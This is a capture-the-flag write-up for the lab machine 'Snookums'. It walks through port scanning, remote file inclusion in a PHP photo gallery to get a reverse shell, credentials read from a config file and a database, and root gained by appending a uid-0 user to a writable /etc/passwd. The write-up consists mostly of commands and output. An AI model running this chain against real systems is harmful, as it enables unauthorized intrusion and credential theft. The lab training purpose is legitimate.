Snookums
Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.115.58
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-04 06:43 +03
Nmap scan report for 192.168.115.58 07:04:50 [41/188]
Host is up, received echo-reply ttl 61 (0.17s latency).
Scanned at 2025-10-04 06:43:25 +03 for 242s
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 61 vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.45.235
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 4a:79:67:12:c7:ec:13:3a:96:bd:d3:b4:7c:f3:95:15 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtUk/m8ssh+nfn52VkolWbpJihGyH2vdELXJv/X0HIj5hbkXnM1QgSSKltTq+cev1QtkrwtUTV3j2AD5Ftxz7ivrm0PvsGNI6QGnIxdAwCvt1OjDHoz6IGDS4kz5IcW3Q3S
mwceCwDKPA55mupKhKlKjkZyLn4+d9An50AV1Hyj+E8APALHQBQFVp7cdJe9lqj7K8dxNVo1XExUDgU3trRSGDO5bZN7C57VsHXN6MIITU9RtyMhLbxYwA6KTU8RluW1/5v7T4EnHlRZcdmbneVcefK+EK69Mgdn5L+ww/5YrWi
YbXDOUTEymWfeyoOl2LoFBD/nmSb9hayKirR4guf
| 256 a8:a3:a7:88:cf:37:27:b5:4d:45:13:79:db:d2:ba:cb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOk5HGeIHhlXkWc9v507Ap0zc5wnKxhGa7WG9fWJhL/yr9bveHEBZllHErnP6vaWM4WRudCxA6z6rqnhep9wNW8=
| 256 f2:07:13:19:1f:29:de:19:48:7c:db:45:99:f9:cd:3e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDvde70kt/TjqXRmChJ0XvKYTpljMNu6TKlAtF/S4IHL
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Simple PHP Photo Gallery
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
111/tcp open rpcbind syn-ack ttl 61 2-4 (RPC #100000)
|_vulners: ERROR: Script execution failed (use -d to debug)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.10.4 (workgroup: SAMBA)
3306/tcp open mysql syn-ack ttl 61 MySQL (unauthorized)
33060/tcp open mysqlx syn-ack ttl 61 MySQL X protocol listener
Service Info: Host: SNOOKUMS; OS: UnixFTP (21):
Anonymous login is present, but I could not do anything or find any useful thing.
HTTP (80):
Run directory fuzzing:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ gobuster dir -u http://192.168.115.58 -w /usr/share/wordlists/dirb/common.txt -x php
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.115.58
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 206]
/.htaccess.php (Status: 403) [Size: 215]
/.htaccess (Status: 403) [Size: 211]
/.hta.php (Status: 403) [Size: 210]
/.htpasswd (Status: 403) [Size: 211]
/.htpasswd.php (Status: 403) [Size: 215]
/cgi-bin/ (Status: 403) [Size: 210]
/css (Status: 301) [Size: 234] [--> http://192.168.115.58/css/]
/db.php (Status: 200) [Size: 0]
/functions.php (Status: 200) [Size: 0]
/image.php (Status: 200) [Size: 1508]
/images (Status: 301) [Size: 237] [--> http://192.168.115.58/images/]
/index.php (Status: 200) [Size: 2730]
/index.php (Status: 200) [Size: 2730]
/js (Status: 301) [Size: 233] [--> http://192.168.115.58/js/]
/photos (Status: 301) [Size: 237] [--> http://192.168.115.58/photos/]
Progress: 9226 / 9226 (100.00%)
===============================================================
Finished
===============================================================Lets explore the website:
Simple php photo gallery running on port 80, and it exposes its current version 0.8, we can search for any public exploits:
We can test if this vulnerability still exists or get fixed:
This exploit states that the application was vulnerable to LFI and if allow_url_fopen was enabled to RFI as well.
Also the vulnable endpoint is /image.php?img=.
We can test this out:
The vulnearbility still exists.
Try RFI:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Go back to our web server:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.115.58 - - [04/Oct/2025 07:18:23] code 404, message File not found
192.168.115.58 - - [04/Oct/2025 07:18:23] "GET /test.php HTTP/1.0" 404 -It tried to load to get test.php but did not find it.
Exploitation:
Shell as apache:
We can now pull php reverse shell from the webshells, and change the IP, and the port to get a reverse shell:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ cat shell.php
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.45.235'; // CHANGE THIS
$port = 80; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
<snipped>We have to put our port to something the target machine can reach out to, because sometimes if firewall is running it will block all ports except configured ones in services like http or mysql, etc.
As shown in the nmap scan that port 3306 is open, we will start our webserver to listen on that port and host our php reverse shell:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ python3 -m http.server 3306
Serving HTTP on 0.0.0.0 port 3306 (http://0.0.0.0:3306/) ...And start our listener:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ nc -nlvp 80
listening on [any] 80 ...Now try with shell.php instead of test.php:
We can see it will hang, because we got a shell:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ python3 -m http.server 3306
Serving HTTP on 0.0.0.0 port 3306 (http://0.0.0.0:3306/) ...
192.168.115.58 - - [04/Oct/2025 07:27:46] "GET /shell.php HTTP/1.0" 200 -┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.235] from (UNKNOWN) [192.168.115.58] 49114
Linux snookums 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
00:27:47 up 1:15, 0 users, load average: 0.04, 0.04, 0.08
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
sh: no job control in this shell
sh-4.2$Stabilize our shell:
sh-4.2$ which python
/usr/bin/python
sh-4.2$ python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.2$ export TERM=xterm
bash-4.2$ ^Z
zsh: suspended nc -nlvp 80
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Snookums]
└─$ stty raw -echo ; fg
[1] + continued nc -nlvp 80
bash-4.2$ stty rows 43 columns 171Now we have full interactive shell.
When we read the /etc/passwd file, we will find michael presents there, but ls the home folder:
bash-4.2$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
michael:x:1000:1000:Michael:/home/michael:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
bash-4.2$ ls -la
total 0
drwxr-xr-x. 3 root root 21 Jun 9 2020 .
dr-xr-xr-x. 17 root root 224 Jun 9 2020 ..
drwx------. 2 michael michael 100 Jul 9 2020 michaelLateral Movement to michael:
As we have seen in the gobuster that we have db.php, lets read it to maybe find any credentials, so we can resuse the password, or access the mysql database:
bash-4.2$ cat /var/www/html/db.php
<?php
define('DBHOST', '127.0.0.1');
define('DBUSER', 'root');
define('DBPASS', 'MalapropDoffUtilize1337');
define('DBNAME', 'SimplePHPGal');
?>Try it with mysql:
bash-4.2$ mysql -h localhost -u root -pMalapropDoffUtilize133707:30:50 [2568/2862]
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 21
Server version: 8.0.20 MySQL Community Server - GPL
Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>We successfully authenticated to mysql as root with that password.
Lets do some enumeration:
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| SimplePHPGal |
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.00 sec)We will find SimplePHPGal which is not a default database:
mysql> use SimplePHPGal
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+------------------------+
| Tables_in_SimplePHPGal |
+------------------------+
| users |
+------------------------+
1 row in set (0.00 sec)
mysql> desc users;
+----------+--------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+----------+--------------+------+-----+---------+-------+
| username | varchar(20) | YES | | NULL | |
| password | varchar(100) | YES | | NULL | |
+----------+--------------+------+-----+---------+-------+
2 rows in set (0.00 sec)We have users tables that contains two columns.
mysql> select * from users;
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| josh | VFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0= |
| michael | U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ== |
| serena | VDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ== |
+----------+----------------------------------------------+
3 rows in set (0.00 sec)The passwords seemes to be base64 encoded, lets decode them, and try them one by one:
bash-4.2$ echo 'U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==' | base64 -d | base64 -d
HockSydneyCertify123Lets try this password for michael:
bash-4.2$ su michael
Password: HockSydneyCertify123
[michael@snookums html]$We are michael.
Privilege Escalation:
I will upload linpeas to perform a quick automated scan for us:
[michael@snookums shm]$ curl http://192.168.45.235/linpeas.sh -o linpeas.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 933k 100 933k 0 0 111k 0 0:00:08 0:00:08 --:--:-- 147k
[michael@snookums shm]$ chmod +x linpeas.sh
[michael@snookums shm]$ ls
linpeas.shRun it:
[michael@snookums shm]$ ./linpeas.sh
<snipped>
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#init-initd-systemd-and-rcd
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. NOWe can make sure that this is the case:
[michael@snookums shm]$ ls -la /etc/passwd
-rw-r--r--. 1 michael root 1226 Oct 4 00:43 /etc/passwdWe will find the passwd file is writable, which could help us by adding a new user as root.
First we need to generate a hashes password using openssl or any other tool:
[michael@snookums shm]$ openssl passwd -1 -salt YouGotHacked password123
$1$YouGotHa$UeD83vWG2A9aoTiTM3.XrEcho this hash to the end of the passwd file with the Caesar3 user:
[michael@snookums shm]$ echo 'Caesar3:$1$YouGotHa$UeD83vWG2A9aoTiTM3.Xr:0:0:test:/root:/bin/bash' >> /etc/passwdWe assigned the user id and group id to 0 which is the same as root.
Check if our command worked:
[michael@snookums shm]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
<snipped>
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
Caesar3:$1$YouGotHa$UeD83vWG2A9aoTiTM3.Xr:0:0:test:/root:/bin/bashWe will see that our newly created user at the bottom of the file.
Now swithc user to Caesar3:
[michael@snookums shm]$ su Caesar3
Password: password123
[root@snookums shm]# id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:httpd_t:s0We successfully rooted the box.
Read the flags:
[root@snookums shm]# cat /root/proof.txt
3f684b0bd97f2e1b88aa03326d413184
[root@snookums shm]# cat /home/michael/local.txt
abf19481ec7d4a219639adca6a3f933bLast updated